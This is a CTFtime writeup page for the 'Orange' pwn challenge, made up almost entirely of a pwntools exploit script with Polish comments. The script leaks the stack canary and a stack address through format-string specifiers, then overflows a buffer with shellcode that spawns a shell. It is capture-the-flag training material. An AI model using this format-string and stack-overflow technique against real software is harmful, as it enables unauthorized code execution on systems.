CTFtime.org

Orange

Points: 350

Tags: pwn 

Poll rating:

Just code:

from pwn import *             #include
context.log_level='info'      #na poczatku mozna
#context.log_level='debug'     #dokladnie pokazuje wyslanie 
#-
context.update(arch='x86_64', os='linux') #o tym pamietac jak sie nie pobiera danych z pliku
context.terminal = ['wt.exe','wsl.exe'] #do wsl

binary = context.binary = ELF("./orange", checksec=False)


if args.GDB:
    gdbscript = """
    call puts("Hello from process debugger!")
    b *0x0000000000401196
    """
    p = process(binary.path)
elif args.REMOTE:
    address='orange.uctf.ir'
    port='5001'    
    p=remote(address,port) #laczenie online
else:
    p = process(binary.path)
    

if args.GDB:    
    gdb.attach(p,gdbscript)
    pause (3)                #wcisnąć c jak sie uruchomi debugger
    #p.sendline(payload)
    p.interactive()

RET=0x000000000040101a

CANARYp=b'%17$p'
p.sendlineafter(b'Enter your name:',CANARYp)
info(f"Enter your name: {CANARYp}")
p.sendlineafter(b'Enter your choice:',b'3')
info(f"3. Buy Oranges->3")
p.sendlineafter(b'to buy:',b'1')
info(f"Enter the number of oranges you want to buy ->1")
p.sendlineafter(b'Enter your choice:',b'1')
info(f"1. Show Cart->1")
p.recvuntil(b"Buyer: ")
CANARY=p.recvline().strip()
info (f"CANARY: {CANARY}")    
CANARY=int(CANARY,16)

p.sendlineafter(b'5. Change Buyer Name',b'5')
info(f"5. Change Buyer Name->5")

STACKp=b'%7$p'
p.sendlineafter(b'Enter your name:',STACKp)
info(f"Enter your name: {STACKp}")

p.sendlineafter(b'Enter your choice:',b'1')
info(f"1. Show Cart->1")
p.recvuntil(b"Buyer: ")
STACK=p.recvline().strip()
STACK=int(STACK,16)+0x10 #ok

info (f"STACK: {hex(STACK)}")    

p.sendlineafter(b'Enter your choice:',b'1')
info(f"1. Show Cart->1")

gdbscript = """
#call puts("Hello from process debugger!")
#start
#b *main
#SET_BUYER_NAME
b *0x0000000000401720
"""
#gdb.attach(p,gdbscript)
#pause (5)                #wcisnąć c jak sie uruchomi debugger

p.sendlineafter(b'5. Change Buyer Name',b'5')

info(f"5. Change Buyer Name->5")


SHELLCODE= asm(shellcraft.sh())


payload=SHELLCODE+b'B'*(104-len(SHELLCODE))+p64(CANARY)+p64(RET)+p64(STACK)
pause (1)
p.sendlineafter(b'Enter your name:',payload)
p.interactive()

by Kerszi/MindCrafters

Writeups

ActionRatingAuthor team
Read writeup
not rated
 MindCrafters
You need to authenticate and join a team to post writeups

Comments